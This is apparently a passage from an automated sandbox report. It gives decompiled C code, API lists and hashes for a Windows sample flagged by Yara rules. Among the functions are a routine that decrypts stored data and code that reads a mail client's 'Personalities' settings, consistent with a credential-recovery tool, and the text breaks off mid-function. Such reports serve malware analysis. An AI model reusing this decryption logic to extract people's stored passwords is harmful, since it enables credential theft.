                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AB54, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void _v1095;
				char _v1096;
				void* __ebx;
				char _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t39;
				void* _t52;
				char _t59;
				char* _t60;
				intOrPtr _t61;

				_v1096 = 0;
				memset( &_v1095, 0, 0x3ff);
				_v8 = 0x747874;
				_t29 = E004078FF(0x1f5);
				_t59 = "*.txt";
				_v72 = _t29;
				_v68 = _t59;
				_v64 = E004078FF(0x1f6);
				_v60 = _t59;
				_v56 = E004078FF(0x1f7);
				_v52 = _t59;
				_t32 = E004078FF(0x1f8);
				_t60 = "*.htm;*.html";
				_v48 = _t32;
				_v44 = _t60;
				_v40 = E004078FF(0x1f9);
				_v36 = _t60;
				_v32 = E004078FF(0x1fa);
				_v28 = "*.xml";
				_t35 = E004078FF(0x1fb);
				_t61 = "*.csv";
				_v24 = _t35;
				_v20 = _t61;
				_v16 = E004078FF(0x1fc);
				_v12 = _t61;
				E0040684D( &_v1096,  &_v72, 8);
				_t52 = 7;
				_t39 = E004078FF(_t52);
				_t23 =  &_v8; // 0x747874
				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
			}































                                                  0x0040ab6d
                                                  0x0040ab74
                                                  0x0040ab81
                                                  0x0040ab88
                                                  0x0040ab8d
                                                  0x0040ab93
                                                  0x0040ab96
                                                  0x0040aba3
                                                  0x0040aba6
                                                  0x0040abaf
                                                  0x0040abb2
                                                  0x0040abb5
                                                  0x0040abba
                                                  0x0040abc4
                                                  0x0040abc7
                                                  0x0040abd0
                                                  0x0040abd3
                                                  0x0040abe0
                                                  0x0040abe3
                                                  0x0040abea
                                                  0x0040abef
                                                  0x0040abf5
                                                  0x0040abf8
                                                  0x0040ac00
                                                  0x0040ac0f
                                                  0x0040ac12
                                                  0x0040ac1b
                                                  0x0040ac1c
                                                  0x0040ac24
                                                  0x0040ac44

                                                  APIs
                                                  • memset.MSVCRT ref: 0040AB74
                                                    • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                    • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                    • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                    • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                    • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                    • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                    • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                    • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                    • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                    • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                    • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 4021364944-3614832568
                                                  • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                  • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                  • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                  • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406491, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E00406491(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}








                                                  0x00406491
                                                  0x004064a8
                                                  0x004064ad
                                                  0x004064b9
                                                  0x004064bc
                                                  0x004064c9
                                                  0x004064e1
                                                  0x004064f5
                                                  0x00406511

                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 0040649C
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                  • ReleaseDC.USER32 ref: 004064BC
                                                  • GetWindowRect.USER32 ref: 004064C9
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CapsDeviceWindow$MoveRectRelease
                                                  • String ID:
                                                  • API String ID: 3197862061-0
                                                  • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                  • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                  • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                  • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403A8D, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E004118A0(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                                  0x00403a95
                                                  0x00403aab
                                                  0x00403ab2
                                                  0x00403ac5
                                                  0x00403acb
                                                  0x00403ae2
                                                  0x00403b01
                                                  0x00403b2d

                                                  APIs
                                                  • memset.MSVCRT ref: 00403AB2
                                                  • memset.MSVCRT ref: 00403ACB
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                  • strlen.MSVCRT ref: 00403B13
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                  • String ID:
                                                  • API String ID: 1786725549-0
                                                  • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                  • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                  • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                  • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406585, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                  0x00406585
                                                  0x0040659d
                                                  0x004065a4
                                                  0x004065a9
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b1
                                                  0x004065b8
                                                  0x004065c5
                                                  0x004065ca
                                                  0x004065cf
                                                  0x004065d7
                                                  0x004065dd
                                                  0x004065e2
                                                  0x004065e6
                                                  0x004065ec
                                                  0x004065f4
                                                  0x004065fa
                                                  0x004065ec
                                                  0x00406603
                                                  0x00406608
                                                  0x00406610
                                                  0x00406617

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcat$memsetsprintf
                                                  • String ID: %2.2X
                                                  • API String ID: 582077193-791839006
                                                  • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                  • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                  • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                  • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040FEED, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E0040FEED(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x414288;
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B5B(_t18);
					_push(_t18);
					L004115D6();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B5B(_t19);
					_push(_t19);
					L004115D6();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B5B(_t20);
					_push(_t20);
					L004115D6();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A4E(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A4E(_t22);
					_push(_t22);
					L004115D6();
				}
				return _t9;
			}











                                                  0x0040feed
                                                  0x0040feed
                                                  0x0040fef2
                                                  0x0040fef8
                                                  0x0040fefa
                                                  0x0040fefb
                                                  0x0040ff00
                                                  0x0040ff04
                                                  0x0040ff06
                                                  0x0040ff0e
                                                  0x0040ff10
                                                  0x0040ff15
                                                  0x0040ff16
                                                  0x0040ff1b
                                                  0x0040ff1c
                                                  0x0040ff24
                                                  0x0040ff26
                                                  0x0040ff2b
                                                  0x0040ff2c
                                                  0x0040ff31
                                                  0x0040ff32
                                                  0x0040ff3a
                                                  0x0040ff3c
                                                  0x0040ff41
                                                  0x0040ff42
                                                  0x0040ff47
                                                  0x0040ff48
                                                  0x0040ff50
                                                  0x0040ff52
                                                  0x0040ff57
                                                  0x0040ff58
                                                  0x0040ff5d
                                                  0x0040ff5e
                                                  0x0040ff66
                                                  0x0040ff68
                                                  0x0040ff6d
                                                  0x0040ff6e
                                                  0x0040ff73
                                                  0x0040ff75

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                  • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                  • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                  • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040173B, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E0040173B(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                  0x0040174a
                                                  0x00401761
                                                  0x0040176b
                                                  0x00401773
                                                  0x00401774
                                                  0x00401778
                                                  0x0040177d
                                                  0x0040178d
                                                  0x004017a3

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                  • String ID:
                                                  • API String ID: 19018683-0
                                                  • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                  • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                  • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                  • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00411366, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v16;
				char _v24;
				char _v116;
				void _v1156;
				char _v1164;
				void _v1171;
				char _v1172;
				char _v2188;
				void _v2195;
				void _v2196;
				void _v3251;
				void _v3252;
				char _v4020;
				void* __edi;
				void* __esi;
				void* _t96;
				char _t105;
				intOrPtr _t112;
				void* _t115;
				signed int _t116;
				int _t121;
				signed int* _t122;
				void* _t124;
				void* _t125;
				signed int _t128;
				signed int* _t129;
				void* _t132;

				_t116 = __edx;
				_t105 = 0;
				_v2196 = 0;
				memset( &_v2195, 0, 0x3ff);
				_v3252 = 0;
				memset( &_v3251, 0, 0x41e);
				_v1172 = 0;
				memset( &_v1171, 0, 0x41e);
				_a8 = E00410E8A(_a8,  &_v2196);
				_t121 = strlen(_a4);
				if(_a8 > 8) {
					_t137 = _t121;
					if(_t121 > 0) {
						memcpy( &_v3252, _a4, _t121);
						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
						E0040BC49( &_v116);
						_t19 = _t121 + 8; // 0x8
						E0040BC6D(_t19,  &_v116,  &_v3252);
						_t127 =  &_v116;
						E0040BD0B(_t121,  &_v116,  &_v1172);
						_t23 = _t121 + 8; // 0x8
						memcpy( &_v1156,  &_v3252, _t23);
						E0040BC49( &_v116);
						_t27 = _t121 + 0x18; // 0x18
						E0040BC6D(_t27, _t127,  &_v1172);
						E0040BD0B(_t121, _t127,  &_v24);
						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
						_t122 = _a12;
						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
						_t112 = _a8;
						_t128 = 0;
						if(_t112 >= 0x18) {
							_t37 = _t112 - 0x18; // -16
							asm("cdq");
							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
						}
						if(_t128 > _t105) {
							_a4 =  &_v2188;
							_t125 = _t122 + 8;
							_v8 = _t128;
							do {
								E004053D6(_a4, _t112, _t125,  &_v4020);
								_a4 = _a4 + 8;
								_t125 = _t125 + 8;
								_t45 =  &_v8;
								 *_t45 = _v8 - 1;
								_pop(_t112);
							} while ( *_t45 != 0);
							_t112 = _a8;
						}
						_t96 = 8 + _t128 * 8;
						_t50 = _t96 + 8; // 0x8
						if(_t50 > _t112) {
							_t51 = _t112 - 8; // 0x0
							_t96 = _t51;
						}
						if(_t96 > _t105) {
							_t129 = _a12;
							_t124 =  &_v2188 - _t129;
							_t115 = _t96;
							do {
								 *_t129 =  *_t129 ^  *(_t124 + _t129);
								_t129 =  &(_t129[0]);
								_t115 = _t115 - 1;
							} while (_t115 != 0);
						}
						 *((char*)(_t96 + _a12)) = _t105;
						 *_a16 = 1;
						_t105 = 1;
					}
				}
				return _t105;
			}































                                                  0x00411366
                                                  0x00411372
                                                  0x00411381
                                                  0x00411387
                                                  0x0041139a
                                                  0x004113a0
                                                  0x004113ae
                                                  0x004113b4
                                                  0x004113cd
                                                  0x004113da
                                                  0x004113dc
                                                  0x004113e2
                                                  0x004113e4
                                                  0x004113f5
                                                  0x0041140b
                                                  0x00411413
                                                  0x0041141f
                                                  0x00411425
                                                  0x00411431
                                                  0x00411434
                                                  0x00411439
                                                  0x0041144b
                                                  0x00411452
                                                  0x0041145e
                                                  0x00411463
                                                  0x0041146c
                                                  0x00411488
                                                  0x0041148d
                                                  0x0041149a
                                                  0x0041149f
                                                  0x004114a5
                                                  0x004114aa
                                                  0x004114ac
                                                  0x004114af
                                                  0x004114ba
                                                  0x004114ba
                                                  0x004114bd
                                                  0x004114c5
                                                  0x004114c8
                                                  0x004114cb
                                                  0x004114ce
                                                  0x004114d8
                                                  0x004114dd
                                                  0x004114e1
                                                  0x004114e4
                                                  0x004114e4
                                                  0x004114e7
                                                  0x004114e7
                                                  0x004114ea
                                                  0x004114ea
                                                  0x004114ed
                                                  0x004114f4
                                                  0x004114f9
                                                  0x004114fb
                                                  0x004114fb
                                                  0x004114fb
                                                  0x00411500
                                                  0x00411502
                                                  0x0041150b
                                                  0x0041150d
                                                  0x0041150f
                                                  0x00411512
                                                  0x00411514
                                                  0x00411515
                                                  0x00411515
                                                  0x0041150f
                                                  0x0041151b
                                                  0x00411524
                                                  0x00411526
                                                  0x00411526
                                                  0x004113e4
                                                  0x0041152e

                                                  APIs
                                                  • memset.MSVCRT ref: 00411387
                                                  • memset.MSVCRT ref: 004113A0
                                                  • memset.MSVCRT ref: 004113B4
                                                    • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                  • strlen.MSVCRT ref: 004113D0
                                                  • memcpy.MSVCRT ref: 004113F5
                                                  • memcpy.MSVCRT ref: 0041140B
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                    • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                  • memcpy.MSVCRT ref: 0041144B
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                    • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                    • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset$strlen
                                                  • String ID:
                                                  • API String ID: 2142929671-0
                                                  • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                  • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                  • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                  • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004078FF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 36%
                                                  			E004078FF(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x417540 == 0) {
					E0040787D();
				}
				_t40 =  *0x417538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4171b8 == 0) {
							_push( *0x417548 - 1);
							_push( *0x41752c);
							_push(_t39);
							_push(E00407A55());
							goto L16;
						} else {
							strcpy(0x4172c0, "strings");
							_t31 = E00407D89(_t39,  *0x41752c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x417548 - 1);
								_push( *0x41752c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41752c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x417548 - 1);
						_push( *0x41752c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x416b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x412466;
					} else {
						_t23 =  *0x41753c;
						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x417528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41752c, _t10);
							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
							 *( *0x417530 +  *0x417538 * 4) = _t39;
							 *0x417538 =  *0x417538 + 1;
							 *0x41753c =  *0x41753c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}













                                                  0x004078ff
                                                  0x00407906
                                                  0x00407908
                                                  0x00407908
                                                  0x0040790d
                                                  0x00407914
                                                  0x00407919
                                                  0x0040792b
                                                  0x0040792b
                                                  0x0040791b
                                                  0x0040791b
                                                  0x00407926
                                                  0x00407929
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407929
                                                  0x0040795f
                                                  0x0040795f
                                                  0x0040792d
                                                  0x0040792f
                                                  0x00407a50
                                                  0x00407a50
                                                  0x00407935
                                                  0x0040793b
                                                  0x0040796e
                                                  0x004079ba
                                                  0x004079bb
                                                  0x004079c1
                                                  0x004079c7
                                                  0x00000000
                                                  0x00407970
                                                  0x0040797a
                                                  0x00407986
                                                  0x0040798b
                                                  0x00407990
                                                  0x004079a4
                                                  0x004079aa
                                                  0x004079ab
                                                  0x004079b1
                                                  0x00000000
                                                  0x00407992
                                                  0x0040799d
                                                  0x004079a2
                                                  0x00000000
                                                  0x00000000
                                                  0x004079a2
                                                  0x00407990
                                                  0x0040793d
                                                  0x00407943
                                                  0x00407944
                                                  0x0040794d
                                                  0x0040794e
                                                  0x0040794e
                                                  0x004079c8
                                                  0x004079ce
                                                  0x004079d0
                                                  0x004079d0
                                                  0x004079d2
                                                  0x00407a49
                                                  0x00407a49
                                                  0x004079d4
                                                  0x004079d4
                                                  0x004079e3
                                                  0x00000000
                                                  0x004079f3
                                                  0x004079f9
                                                  0x004079fc
                                                  0x00407a07
                                                  0x00407a1d
                                                  0x00407a2b
                                                  0x00407a36
                                                  0x00407a42
                                                  0x00407a47
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a47
                                                  0x004079e3
                                                  0x004079d2
                                                  0x00407a54

                                                  APIs
                                                  • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                    • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                  • strlen.MSVCRT ref: 00407998
                                                  • LoadStringA.USER32 ref: 004079C8
                                                  • memcpy.MSVCRT ref: 00407A07
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                    • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                  • String ID: strings
                                                  • API String ID: 1748916193-3030018805
                                                  • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                  • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                  • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                  • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040329E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040329E(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E004021D8( &_v1968);
					if(E0040314D(_t52, _t49, 0) != 0) {
						E00402407(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
